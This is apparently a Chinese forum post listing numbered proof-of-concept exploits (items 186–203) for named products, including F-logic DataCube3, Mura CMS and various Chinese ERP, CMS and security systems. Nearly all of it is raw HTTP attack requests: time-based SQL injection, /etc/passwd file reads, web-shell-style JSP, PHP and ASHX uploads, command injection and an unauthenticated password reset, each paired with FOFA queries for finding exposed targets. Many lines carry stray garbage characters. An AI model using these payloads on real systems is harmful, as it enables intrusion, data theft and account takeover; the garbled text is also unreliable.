8 {9 c2 M; U5 R4 ^186. F-logic DataCube3 SQL注入
- N- r7 _# C4 t. g* i) I" i; {! c1 ACVE-2024-31750! M: E. R0 a5 O# Q( _% ~9 ]
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
! \( g) b$ \ `4 Z Q- ZFOFA:title=="DataCube3"
( ]6 |1 s$ K/ APOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
% g4 w0 X% l% x) F, ?Host: your-ip+ k9 d% Q3 U! \/ n: X: ?) u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.00 f. V3 s2 q0 a) h3 X" D& j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
6 B9 F5 d: y, s* v; @1 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! ~! @. d' H( R! s( g( ?
Accept-Encoding: gzip, deflate7 \3 y* h: `* U/ m! J- F
Connection: close1 f; a; e |) a
Content-Type: application/x-www-form-urlencoded
- M) A7 g- l: S% n3 \1 E% Q! U- I' R! J9 a8 ^+ g, p( x( N
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! u! u. u* @: r' g0 m
6 b5 B1 _$ D+ b9 j
3 p+ ~3 s! {1 h. s d3 J3 z187. Mura CMS processAsyncObject SQL注入
% C3 X& h5 g5 [! D* tCVE-2024-32640
+ J% {. a, G" \6 G8 ~FOFA:"Mura CMS"/ p3 o0 r/ h+ f. ^0 l
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1$ h4 j* t2 C q# U# [
Host: your-ip
0 N/ W; ?5 J# H9 PContent-Type: application/x-www-form-urlencoded" z! T: B9 N1 Y) n% l7 G
0 Y" v9 ]+ K+ W4 G' o, w9 K6 {
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1# w& z+ C& Y+ Y# }* O
, a! e. B6 q2 w! h9 v8 }; J( g0 H( e. Z* e) p+ [* }1 l7 c
188. 叁体-佳会视频会议 attachment 任意文件读取
; B( v- \2 @' Y; ?& O/ Kversion <= 3.9.7" R" W& T3 d) W+ S- h
FOFA:body="/system/get_rtc_user_defined_info?site_id": Z# X0 {3 t: S% c4 b# ]: D* z
GET /attachment?file=/etc/passwd HTTP/1.1
) s$ W" D7 B( f6 a5 \% Y2 KHost: your-ip
; i" I F" s, gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 |. X- y7 a3 X% G' N# U/ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|; o3 G _% vAccept-Encoding: gzip, deflate. d r, R( ]: U M, Y6 Z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 ]% X2 D2 t6 B$ Z t6 w& i! ]Connection: close
! [; k3 g$ x* p G
$ V4 R+ ^* ?* n9 j- p" V2 E- P1 R
, L# r8 ^! }. k+ ?" B189. 蓝网科技临床浏览系统 deleteStudy SQL注入; n1 U4 ^( Q, u. H
FOFA:app="LANWON-临床浏览系统"
7 N, q& A1 @+ R; o* EGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.11 ^- |8 q& k# p: V$ B, v
Host: your-ip
9 n, ^( f# q7 A Q( i" D, j) N% fUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# ]9 W* u; q! g% J) ` j7 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 g' i7 ~( i/ W1 j6 K5 Q0 tAccept-Encoding: gzip, deflate
) ]. l c( Z" `: K3 c5 _8 L+ jAccept-Language: zh-CN,zh;q=0.9
: O) t+ x: w& p9 s6 S+ y' Z5 l, `Connection: close
6 o* _5 g5 d# N% T( j8 K3 i6 r
/ ^0 O4 A7 }8 X0 H# n7 X7 x& c) N+ s9 m, n. _0 m1 [: l; @' t
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& l I1 c7 N1 r7 K( ^FOFA:title=="短视频矩阵营销系统"
% g9 M3 t9 \9 h2 G l0 m9 FPOST /index.php/admin/Userinfo/poihuoqu HTTP/24 k+ v2 s. q6 J* u
Host: your-ip
% d) S$ S+ `) i8 X+ p5 X2 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36& d& W9 `/ U- {1 ?3 W: o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ u. S3 U4 A" oContent-Type: application/x-www-form-urlencoded
/ P( }6 Q! S5 }7 AAccept-Encoding: gzip, deflate
8 `+ d/ [/ r0 p# ?8 z" SAccept-Language: zh-CN,zh;q=0.9
" o ^) {( O# b# |: S$ {1 G* ?; ], I( M
poi=file:///etc/passwd9 T/ V/ P+ a5 O3 {8 g" v/ t; [, B
& l1 M& L# I, j6 B8 A
" ]/ a0 W, q3 Q" ` e W
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
4 Q) {) u i3 ]- AFOFA:body="/CDGServer3/index.jsp"# F1 D. U2 M1 F: Q8 Q0 |8 j. O
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
& \7 T; w- p* ]/ OHost: your-ip
7 ^$ `. b K3 b' b& ~- ~. @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% G3 {; ~8 @2 s" U" B: _1 X$ [3 L
Content-Type: application/x-www-form-urlencoded
( c7 @7 X1 q+ Q$ p9 [' k3 m; X2 ~4 o* J0 }$ _% N
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
) D9 s+ I! m# X( d/ H6 s
" a8 W6 T: a' |" s3 a a$ Z( m/ f% z, L* u/ v \
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
1 d+ ]4 U- D# nFOFA:title="用户登录_富通天下外贸ERP"
' j, u6 H/ S8 ?* B w" f' v5 ~7 }POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.16 u8 W& O7 [4 c9 O0 C: [4 r
Host: your-ip7 ]- f. w' t4 B# Q$ t2 r$ Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
6 R# k) {! E s8 k0 a' \; s$ aContent-Type: application/x-www-form-urlencoded& |1 y( |" u' ?% C1 _, J/ s
) r# M2 z9 ?1 E" E. T B6 x2 r% N& y- j3 ^
<% @ webhandler language="C#" class="AverageHandler" %>
* n) ?& X0 S( f+ ^9 {( X6 Rusing System;
" X! [4 X2 B! |/ E W xusing System.Web;/ x. K4 D8 B* _. x
public class AverageHandler : IHttpHandler' Y& S. q/ T+ C1 Z& T
{
7 I% ~8 L6 u+ }! ipublic bool IsReusable T: x5 V+ P' ?4 a
{ get { return true; } }
* }8 ^! ~0 i( {9 a; b4 Z3 Apublic void ProcessRequest(HttpContext ctx)5 e' C1 a4 I; g. v2 [: X7 x
{
: c1 v* z- X9 bctx.Response.Write("test");
2 \+ h s# `" Z5 E: L}9 \3 O) F. k0 _0 O- _( J3 ^
}2 a& x5 n* U6 ?) v+ ^# P
" T7 |; n- G/ Y8 e
6 K2 ~9 C- p: e, E! \. o" _+ B" g193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 R( J% N7 v, u9 K; \- qFOFA:body="山石云鉴主机安全管理系统"9 W( X& D+ U1 l, b: ^: }
GET /master/ajaxActions/getTokenAction.php HTTP/1.11 u9 H1 m, x) ~; H% ^* \
Host:
& Y# Q# O4 A# ^3 ]( B; C5 S/ ~. ECookie: PHPSESSID=2333333333333;+ z( \; K, H& d I' M. K( {
Content-Type: application/x-www-form-urlencoded1 {# V5 @7 m q z% m
User-Agent: Mozilla/5.0
% S/ W7 B8 y$ L/ O& U3 V9 p( J% \! W+ K8 n6 |' T- E5 M4 V: J
& L% J' b3 I7 d8 a1 }: B
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1* E& x; i4 B9 |3 m0 [/ r' U1 z
Host:
: u7 d% I1 }9 b5 e5 k) \9 e' [4 J: X6 fUser-Agent: Mozilla/5.0$ x- x9 e$ t7 I( I- X
Accept-Encoding: gzip, deflate( |% o! p' o0 M/ K0 y, k" Y) n0 N
Accept: */*+ F I4 ?- N3 N0 V. ?; F) }
Connection: close3 I" M! p; z* r, i
Cookie: PHPSESSID=2333333333333;
* D2 T. h3 J2 T# P1 p) I1 MContent-Type: application/x-www-form-urlencoded
3 Z, l) g( y! T' ~- _Content-Length: 84
! p2 `+ K5 R0 h6 E- u& t- O2 p+ e6 O) O0 u4 S$ `8 a* H
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
% @% N" K; v1 \3 j1 C9 M/ W' y; f
. A S, {% H# h. D# MGET /master/img/config HTTP/1.1
' d9 N' T( _% \" b. q7 D+ w+ MHost:
/ P) y9 \) Z( s0 q% `User-Agent: Mozilla/5.0
8 A. q i7 f9 z1 E9 s5 Q
0 ^% V, _3 ` H( M! j
. [* h$ E! A' ~% L2 n; `/ L194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
' p- a1 _6 K5 {8 y5 M4 r) JFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在1 `+ P! @# ~- m) N! W
' W4 T6 a2 H6 ]; c- S8 Z1 QPOST /servlet/uploadAttachmentServlet HTTP/1.1
, v( s1 e4 f1 R* G+ K3 s1 T2 ^Host: host0 f4 \ Z7 i* c5 ^( |/ B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
0 J1 k4 G' T0 l- m# A) ^0 {9 a( kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. j* ]' f1 S% ^1 _, ?' `4 g2 r! G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; d1 U4 Y: V0 W# X& D6 p. _Accept-Encoding: gzip, deflate& [" H: Q8 P2 ?9 G9 Q
Connection: close: Z! M/ H( t% O4 v( ?, q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ }* S+ f6 d: B# x------WebKitFormBoundaryKNt0t4vBe8cX9rZk& l& E: o! ~# a
, H! D n- a+ z, O* S6 k, Y( JContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
/ q# L' G& j2 w$ q, cContent-Type: text/plain8 R" @- B. u4 m( A
<% out.println("hello");%>
/ d% h+ Y8 N$ L E8 n5 @, x, E------WebKitFormBoundaryKNt0t4vBe8cX9rZk- s K# T" {, W- A4 K
Content-Disposition: form-data; name="json"
# }4 V0 Z- I0 R) U& e {"iq":{"query":{"UpdateType":"mail"}}}
% Y/ o; x* l5 H( Y5 \------WebKitFormBoundaryKNt0t4vBe8cX9rZk--0 m4 v4 j9 q# r3 D8 V( y0 T
8 x& y3 \" [- G$ ?
- o% w. n% V. @8 _* D: m" `195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, C, E' z- r0 X" A( o9 OFOFA:title=="飞鱼星企业级智能上网行为管理系统8 M1 ?' f& u; v- C# a
POST /send_order.cgi?parameter=operation HTTP/1.11 k; a+ l5 V% s5 H
Host: 127.0.0.1$ e! G- x# q! W$ X) e
Pragma: no-cache
, V, l, \ z3 fCache-Control: no-cache# P7 b1 Y( K5 }9 j) {' e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 M4 [ d$ g; U
Accept: */*+ D' ?7 D F7 k W; s' H9 k
Accept-Encoding: gzip, deflate* b; q7 |, f% u& i
Accept-Language: zh-CN,zh;q=0.9
( w3 v# m; ^2 }# oConnection: close }8 O- z+ v" W, B! |" \
Content-Type: application/x-www-form-urlencoded; M) T% X6 m' U% A& [" K
Content-Length: 68" u ], W; W, f+ k6 g# F, X7 [$ T- i
7 R" I0 Z& V5 J0 X$ E" O `* a0 ~{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
: d$ B/ T6 U+ M; s
/ e Q0 s! d. u7 J2 O
' w. h# Z$ M2 N X196. 河南省风速科技统一认证平台密码重置3 |+ z' U: ?. F" Q( T
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
2 g/ H4 ~" c1 ^. b' b( r' r7 ~POST /cas/userCtl/resetPasswordBySuper HTTP/1.11 N- ~) Y8 R4 w; I7 s( I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ B7 w* e1 {) k+ \Content-Type: application/json;charset=UTF-81 s$ {% h+ N+ _
X-Requested-With: XMLHttpRequest
* k$ Q. e1 B0 S, Z: n7 QHost:& t, u2 B( H i' {0 ?4 T. H
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
' L% }0 S- D9 }1 l l7 \: bContent-Length: 454 D9 t9 S9 F" }! Y% k
Connection: close* C: a) N+ }" B+ v! d
/ [( E8 x0 A4 q. H
{"xgh":"test","newPass":"test666","email":""}
$ V$ ^* m1 F1 G3 L5 V( L1 L& i; C' \6 s6 }) H c; \: e
- j: g: K% s+ O0 }; E% u
9 ]% P D& M% Q6 C, c5 ?197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
4 F4 x4 {3 i' I1 x, |3 p" lFOFA:app="浙大恩特客户资源管理系统"
# Q" p6 @) }3 Q# d8 ?7 }5 KGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& s" g8 l0 Z% _3 ^+ rHost:9 T- y$ ^8 ?! B+ M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+ z3 k- i/ t; RAccept-Encoding: gzip, deflate! h. H \/ J7 d! M; J4 C" W
Connection: close/ |. o! S6 P: ?* U& P$ G
% L- K- H$ u$ C. i8 X2 N% L7 t
" \9 s, U$ \( g+ q7 Y
$ U( h6 X( Y8 u198. 阿里云盘 WebDAV 命令注入: A; V @ f2 \9 |4 {! I
CVE-2024-29640; C+ d h# w/ U' \3 a" w
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
% Y6 s' z; Z: c' S' [Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
$ j4 Y% O+ ] q* \; eAccept: */* l- E: b. E8 j& Y9 _- A
Accept-Encoding: gzip, deflate
3 v Y: D0 H9 b7 ] a! I: mAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.65 B6 L2 ~% B6 V$ n
Connection: close
7 W7 j) D- s$ p. i7 H& I5 B1 A/ n$ ^( y
0 O; U) O1 d8 O3 \1 l# l, u199. cockpit系统assetsmanager_upload接口 文件上传$ S: G# e* A, R% j( k# ?6 P0 `
" x. S- f- X( K
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
$ c- w2 t3 x! v/ c/ VGET /auth/login?to=/ HTTP/1.1
+ W2 C; l, v# G' ^1 e. k/ H V7 H# P$ V. n; n' |. |
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
) o4 N7 V: g- L7 V+ Y! G" @ ~; J3 D* l
2.使用刚才上一步获取到的jwt获取cookie:; f3 t2 u, x+ y# T4 @- H1 c
) q) Y% E# G' _POST /auth/check HTTP/1.1
" ^% Z: |) Y0 X. E9 ?3 }% Q. [! {. }Content-Type: application/json
8 K" c, P5 [' e/ I0 c) a' B8 O# d) v" o0 D& `) n: b+ i2 g/ G
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
# R* A9 R, f1 w O- K/ b
( ? _; u4 N% Z. e! [0 ~响应:200,返回值:
$ F3 X1 C# c) }7 oSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/5 O( |1 O* ^2 i
Fofa:title="Authenticate Please!"* N" p6 Z) K7 J/ U
POST /assetsmanager/upload HTTP/1.1
# m0 t& I8 \4 {6 HContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb34 W6 v1 j, a% K/ F2 G- T, M$ _
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
+ _5 m" M, m4 T/ B% Y, h+ y- |; J/ \6 o+ q9 k
-----------------------------36D28FBc36bd6feE7Fb3' w6 w8 A- M" o; V
Content-Disposition: form-data; name="files[]"; filename="tttt.php"% F% i( Y; U1 E
Content-Type: text/php: _' v% Y/ _4 K7 a$ J; @3 V1 u
" U, J7 {0 e9 {( [
<?php echo "tttt";unlink(__FILE__);?>: F0 [" V8 O" }/ Q& P, d- v7 s- F
-----------------------------36D28FBc36bd6feE7Fb3
7 J( l) ]5 I4 f- j3 HContent-Disposition: form-data; name="folder"" C: o9 x9 Z0 {$ V1 Q
) `1 [& n6 g$ ^! W6 ]) |( n3 R
-----------------------------36D28FBc36bd6feE7Fb3--
$ {9 i0 |% I9 L% [& ^# S. o# G4 b7 G8 B) [; ?3 z& o. z. X# n
; L3 E+ H& {( d# Q& L8 [
/storage/uploads/tttt.php6 E9 `3 t) L4 q! N3 t
4 |2 J% V$ E0 C( `% \# i200. SeaCMS海洋影视管理系统dmku SQL注入
( {6 _4 y' ]) f- SFOFA:app="海洋CMS"0 E# q" z# F& T- U
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.12 \! q1 J$ ]( ?0 W: x0 W
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
6 @* t! o3 B, z4 W0 NUpgrade-Insecure-Requests: 1
6 t, M0 ?# t/ A* CCache-Control: max-age=0! I1 Y) o- }- y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 C: J4 v8 L' b, d& W% ^0 J# zAccept-Encoding: gzip, deflate* S# j1 a2 ]. e5 G; k
Accept-Language: zh-CN,zh;q=0.9
- G+ S9 H B1 H* v3 k2 o. W4 v) X" [ B* x
" t# Z8 _) s2 G4 c8 l! A9 m
201. 方正全媒体新闻采编系统 binary SQL注入
( w4 {( w& q9 m$ u) ]FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"3 D: l' g. a4 r4 ]/ d+ C
POST /newsedit/newsplan/task/binary.do HTTP/1.1* }: |7 q3 I8 D" `# n
Content-Type: application/x-www-form-urlencoded
' n3 X; c2 e3 Q8 {9 ^. LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# x5 v7 B; }; w7 Z1 K6 k6 XAccept-Encoding: gzip, deflate
# S; X9 c, Y1 M; g2 r* aAccept-Language: zh-CN,zh;q=0.9( N/ J: j/ i' d; h" l9 i P
Connection: close
6 v: |- H& o- ~) T
) {9 P# k: y, D, s% WTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
' l. u, H! Q+ p+ w. [2 C4 E: x* G" c$ b2 F1 k8 _8 X( F
/ h& ?- j3 B& X: V7 [
202. 微擎系统 AccountEdit任意文件上传
* u- c/ l" I' S- ZFOFA:body="/Widgets/WidgetCollection/", G0 m3 {- n+ }, o$ G
获取__VIEWSTATE和__EVENTVALIDATION值9 U& M+ X$ U& M8 t
GET /User/AccountEdit.aspx HTTP/1.1, ~5 v7 C7 o( k
Host: 滑板人之家. b4 R4 N* j& x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.316 R1 X! s2 ^, J/ a
Content-Length: 0- k/ l6 o& ]8 F1 y$ A" s
w, W6 \7 j5 l
/ Y, d9 L% i1 e& S: f f2 Z替换__VIEWSTATE和__EVENTVALIDATION值' c# X B2 w, B% J- {* r
POST /User/AccountEdit.aspx HTTP/1.1+ I: i7 e! k! _1 D+ Q; g) E Y0 g
Accept-Encoding: gzip, deflate, br
# d7 X, H! _$ C" UContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
: r" {1 u) h- q1 n+ D4 l6 T. h" r4 @( R
-----------------------------786435874t38587593865736587346567358735687: j% p# @, J$ ?+ W, U
Content-Disposition: form-data; name="__VIEWSTATE": ?( a8 D2 J4 N1 y- M3 s
+ Y5 t& Z+ W! k/ N- B; A( Z
__VIEWSTATE+ P% M5 m, `, d5 N# b+ a; K
-----------------------------786435874t385875938657365873465673587356876 v$ `+ Y! S" C( B3 X5 y" y( \
Content-Disposition: form-data; name="__EVENTVALIDATION"8 C! _8 @+ F6 L" `
! b0 e' i' |7 Z5 G2 T0 O9 H6 a* L__EVENTVALIDATION
b ~5 X5 G5 W: g+ q W-----------------------------786435874t38587593865736587346567358735687$ r. H O, @2 w V5 t
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
O- R. n2 U6 Q" J9 q1 rContent-Type: text/plain6 \0 D. N. {8 _' n( j$ [
1 U1 l3 s4 l% B6 k) v- KHello World!
: w: K) X8 D6 U4 V$ h-----------------------------786435874t38587593865736587346567358735687
1 J8 V* B% H+ Y2 d9 j) {+ n+ ^Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"# d% [2 |5 D M$ Z3 l
& R# {: j+ j$ w- \; u上传图片
$ j: x2 E1 d# a% L7 ^0 R8 R-----------------------------786435874t38587593865736587346567358735687
: q) Y& P0 [ [$ e/ DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
) ]/ b# O' y4 r" U& k- [' E. f- Y
, M4 l* C0 l8 D9 Q% W0 C V6 k1 n2 H: w+ s S* ~. f! y% C+ p
-----------------------------786435874t38587593865736587346567358735687
" f v' e6 t2 a4 i6 p) f$ y9 GContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
9 o$ Q$ x3 o$ x& M* B; |
! _+ u7 l) X# u) b4 f+ O/ s% b! P! X3 p P( [
-----------------------------786435874t38587593865736587346567358735687--# {' Y4 {( F( O i
: l, g9 {$ c8 \0 Y/ T& A; Z& C( F4 M+ ~' x+ Y1 _& ~& U0 x8 V. _3 J
/_data/Uploads/1123.txt
/ D- B9 h1 x0 \/ P# ^( b* l! }; q
203. 红海云EHR PtFjk 文件上传2 A3 i7 q9 p$ R" M5 T
FOFA:body="RedseaPlatform"; k# }, C% e# E' B6 E
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
/ a0 H* L5 l2 w3 \ eHost: x.x.x.x: l8 l: X! I4 g2 K( r" U: K8 ~" V
Accept-Encoding: gzip
4 d8 B. ?9 x9 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- \# S( S2 w- }$ U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
9 Y+ K6 x. p) m: R# Z* `Content-Length: 210- T, o/ ~7 J' Y+ {3 a! j/ }
e `9 m. k$ M" W
------WebKitFormBoundaryt7WbDl1tXogoZys46 y7 o2 e3 M2 Z4 H6 B3 R- {& \
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"4 B1 w' x& |: H3 v
Content-Type:image/jpeg
" `1 `# F; M8 @/ f. d# q8 `( L; P: r1 f4 G7 Z
<% out.print("hello,eHR");%>
( \3 m- }6 P' g% e3 t------WebKitFormBoundaryt7WbDl1tXogoZys4--
% P" P _ K4 C/ q8 H1 y% F# {- T3 u8 B2 b) n( X% |6 J& z1 ]
% j# l/ N" \: ~! {
D3 V: P B, \' D
8 a2 m6 E" ~' S! \& H: B7 H i2 G6 _, {) ~% w, Z
2 u: ^% \; q4 r1 } |
发表于 2024-6-5 14:31:29
收藏
支持
反对